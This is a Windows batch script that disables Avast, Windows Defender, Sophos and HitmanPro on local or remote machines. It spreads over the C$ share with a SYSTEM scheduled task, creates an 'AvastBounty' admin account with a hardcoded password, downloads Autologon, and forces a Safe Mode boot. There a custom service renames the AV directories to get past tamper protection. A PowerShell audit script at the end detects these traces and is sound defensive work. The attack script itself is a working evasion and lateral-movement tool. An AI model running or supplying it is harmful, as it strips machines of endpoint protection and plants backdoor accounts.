REM - Author: Roberto Franceschetti
REM - Usage - to disable AV on local machine:  C:\>Avast-DisableAV-Remote.bat
REM - Usage - to disable AV on remote machine: C:\>Avast-DisableAV-Remote.bat TargetComputerName (must be a hostname - IP won't work)
REM - Requires local administrator rights (and admin rights on the target for the remote case: C$ share + SchTasks /s)

IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local)

:Remote
rem - we are exploiting a remote computer - copy script to victim and schedule task to execute it
rem - the task runs this same script (with no argument, i.e. the :Local branch) as SYSTEM one minute from now
COPY "%~dp0Avast-DisableAV-Remote.bat" \\%1\C$\windows\temp\Avast-DisableAV-Remote.bat
powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /s %1 /SC ONCE /TN 'DisableAvast' /TR 'C:\Windows\temp\Avast-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }"
GOTO :eof

:Local
rem - We are running .bat locally - run the exploit
rem - create local admin account used to autologin on first safe boot
net user AvastBounty "Avast123" /ADD
net localgroup administrators AvastBounty /add

rem - add autologin registry entries for next reboot
rem - Sysinternals Autologon sets AutoAdminLogon/DefaultUserName in Winlogon and stores the password as an LSA secret
rem - syntax: Autologon.exe -accepteula <user> <domain> <password>  ("." = local machine)
powershell -command "& { iwr https://live.sysinternals.com/Autologon.exe -OutFile c:\windows\temp\Autologon.exe }"
c:\windows\temp\Autologon.exe -accepteula AvastBounty . Avast123

rem - Now configure the next reboot in safe mode and autologin
bcdedit /set {default} safeboot minimal

rem - create the batch file executed by the DisableAvast service after the safe reboot
rem - will rename ProgramFiles\Avast folders/filesystem drivers, disable WinDefender
rem - will remove the safeboot/autologon entries and reboot
rem - (in Safe Mode the Avast self-protection driver is not loaded, so the renames succeed)
@echo off
echo cd c:\windows\temp > c:\windows\temp\DisableAvastAV.bat
echo ren "C:\Program Files\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat
echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat
echo ren "C:\Program Files\Windows Defender Advanced Threat Protection" "Windows Defender Advanced Threat Protection Disabled" >> c:\windows\temp\DisableAvastAV.bat
echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat
echo ren "C:\ProgramData\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat
rem - sc.exe requires a space between "start=" and the value
echo sc config "avast! Antivirus" start= disabled >> c:\windows\temp\DisableAvastAV.bat
echo sc config "avast! Tools" start= disabled >> c:\windows\temp\DisableAvastAV.bat
echo sc config "AvastWscReporter" start= disabled >> c:\windows\temp\DisableAvastAV.bat
echo sc config "aswbIDSAgent" start= disabled >> c:\windows\temp\DisableAvastAV.bat
echo sc config WinDefend start= disabled >> c:\windows\temp\DisableAvastAV.bat
echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
rem - SAVService = Sophos Anti-Virus, hmpalertsvc = HitmanPro.Alert; harmless "service not started" errors if not installed
echo net stop SAVService >> c:\windows\temp\DisableAvastAV.bat
echo net stop hmpalertsvc >> c:\windows\temp\DisableAvastAV.bat
echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
rem - older Avast installs live in "C:\Program Files\Avast"
echo ren "C:\Program Files\Avast" Avast_Disabled >> c:\windows\temp\DisableAvastAV.bat
rem - clean up: turn off autologon, remove the forced safe boot, remove our service, reboot normally
echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableAvastAV.bat
echo bcdedit /deletevalue {default} safeboot >> c:\windows\temp\DisableAvastAV.bat
echo sc delete DisableAvast >> c:\windows\temp\DisableAvastAV.bat
rem - echo pause >> c:\windows\temp\DisableAvastAV.bat
echo shutdown /r /f /t 0 >> c:\windows\temp\DisableAvastAV.bat

rem - now create the Powershell script that will create a "DisableAvastAV.exe" that will simply execute the DisableAvastAV.bat batch file above:
rem - this is done as Windows 10 won't allow a service to run a .bat file, but a .exe will however run once just fine even if the service fails to start
rem - (Add-Type compiles the C# source below into a console exe; ^" escapes the quotes for cmd so they reach the .ps1 file)
echo $source = @^" > c:\windows\temp\CreateService.ps1
echo using System; >> c:\windows\temp\CreateService.ps1
echo class Hello { >> c:\windows\temp\CreateService.ps1
echo static void Main() { >> c:\windows\temp\CreateService.ps1
echo System.Diagnostics.Process.Start(^"C:\\Windows\\Temp\\DisableAvastAV.bat^"); >> c:\windows\temp\CreateService.ps1
echo } >> c:\windows\temp\CreateService.ps1
echo } >> c:\windows\temp\CreateService.ps1
echo ^"@ >> c:\windows\temp\CreateService.ps1
echo Add-Type -TypeDefinition $source -Language CSharp -OutputAssembly ^"C:\Windows\Temp\DisableAvastAV.exe^" >> c:\windows\temp\CreateService.ps1
@echo on

rem - now execute the powershell script to create the DisableAvastAV.exe file and install it as a service:
powershell set-executionpolicy -executionpolicy bypass
powershell c:\windows\temp\CreateService.ps1
sc create DisableAvast binpath= "c:\windows\temp\DisableAvastAV.exe" start= auto

rem - this entry will allow the DisableAvast service to run in Safeboot as well, otherwise it won't start:
rem - (the key name must match the service name; its default value "Service" tells the Safe Mode loader to start it)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableAvast /f /t REG_SZ /d "service"

rem - now reboot... Safe mode will be activated and the DisableAvastAV.exe service will run, calling the DisableAvastAV.bat script, renaming the Avast folders no longer protected by Tamper Protection
rem - pause
shutdown /r /f /t 0
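Added example, not part of the original script: a PowerShell audit that checks a host for the artifacts the technique above leaves behind (forced Safe Mode in the BCD, a service registered under SafeBoot\Minimal that lives in Windows\Temp, AutoAdminLogon, the DisableAvast task/service, the AvastBounty account, staged files and the renamed AV directories). Every name it looks for is taken from the script above; the only assumption is that it is run from an elevated PowerShell 5.1 session on Windows 10 so that Get-ScheduledTask, Get-LocalUser and Get-Service's StartType are available.

```powershell
# Audit for the safe-boot AV-disable technique (added example; assumes elevated PowerShell 5.1 on Windows 10).
$findings = @()

# 1. Next boot forced into Safe Mode? (left by: bcdedit /set {default} safeboot minimal)
$bcd = bcdedit /enum '{default}' 2>$null
if ($bcd -match '^\s*safeboot\s+') {
    $findings += 'BCD {default} carries a safeboot value: next boot is forced into Safe Mode'
}

# 2. Services allowed to start in Safe Mode (Minimal) whose binary sits in Windows\Temp.
$safeBootKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal'
Get-ChildItem -Path $safeBootKey -ErrorAction SilentlyContinue | ForEach-Object {
    $name = $_.PSChildName
    $svc  = Get-CimInstance -ClassName Win32_Service -Filter "Name='$name'" -ErrorAction SilentlyContinue
    if ($svc -and $svc.PathName -match '\\Windows\\Temp\\') {
        $findings += "SafeBoot\Minimal entry '$name' starts a binary from Windows\Temp: $($svc.PathName)"
    }
}

# 3. Autologon (Sysinternals Autologon sets these two values; the password goes to an LSA secret).
$winlogon = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
if ($winlogon -and $winlogon.AutoAdminLogon -eq '1') {
    $findings += "AutoAdminLogon is enabled for user '$($winlogon.DefaultUserName)'"
}

# 4. Named artifacts created by the script.
if (Get-ScheduledTask -TaskName 'DisableAvast' -ErrorAction SilentlyContinue) {
    $findings += "Scheduled task 'DisableAvast' exists (remote delivery via SchTasks /s)"
}
if (Get-Service -Name 'DisableAvast' -ErrorAction SilentlyContinue) {
    $findings += "Service 'DisableAvast' is registered"
}
if (Get-LocalUser -Name 'AvastBounty' -ErrorAction SilentlyContinue) {
    $findings += "Local account 'AvastBounty' exists"
}

# 5. Files staged in Windows\Temp by the script.
$staged = 'Avast-DisableAV-Remote.bat', 'DisableAvastAV.bat', 'DisableAvastAV.exe', 'CreateService.ps1', 'Autologon.exe'
foreach ($f in $staged) {
    $p = Join-Path $env:SystemRoot "Temp\$f"
    if (Test-Path -LiteralPath $p) { $findings += "Staged file present: $p" }
}

# 6. AV directories already renamed, and AV services forced to Disabled.
$renamed = @(
    'C:\Program Files\Avast Software Disabled',
    'C:\Program Files\Avast_Disabled',
    'C:\ProgramData\Avast Software Disabled',
    'C:\Program Files\Windows Defender Disabled',
    'C:\Program Files\Windows Defender Advanced Threat Protection Disabled',
    'C:\Program Files (x86)\Windows Defender Disabled'
)
foreach ($p in $renamed) {
    if (Test-Path -LiteralPath $p) { $findings += "Renamed AV directory present: $p" }
}
foreach ($s in 'avast! Antivirus', 'avast! Tools', 'AvastWscReporter', 'aswbIDSAgent', 'WinDefend') {
    $svc = Get-Service -Name $s -ErrorAction SilentlyContinue
    if ($svc -and $svc.StartType -eq 'Disabled') { $findings += "AV service '$s' start type is Disabled" }
}

# Report.
if ($findings.Count -eq 0) {
    'No indicators of the safe-boot AV-disable technique found.'
} else {
    $findings | ForEach-Object { "[!] $_" }
}
```

The BCD and SafeBoot\Minimal checks (1 and 2) are the generic ones: they catch the same trick regardless of the account, task and file names used, since any variant of it has to force a Safe Mode boot and register a service (or rename itself to match an existing SafeBoot entry) to get code to run there. Checks 3 to 6 match the specific names this script uses and will miss a trivially modified copy; treat them as corroboration, not as the primary detection.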